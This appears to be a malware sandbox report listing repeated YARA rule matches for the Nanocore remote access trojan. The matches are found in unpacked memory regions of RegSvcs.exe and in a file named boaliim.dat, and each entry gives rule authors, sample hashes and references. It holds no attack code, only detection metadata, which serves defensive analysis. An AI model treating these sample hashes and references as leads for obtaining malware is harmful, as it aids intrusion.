Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
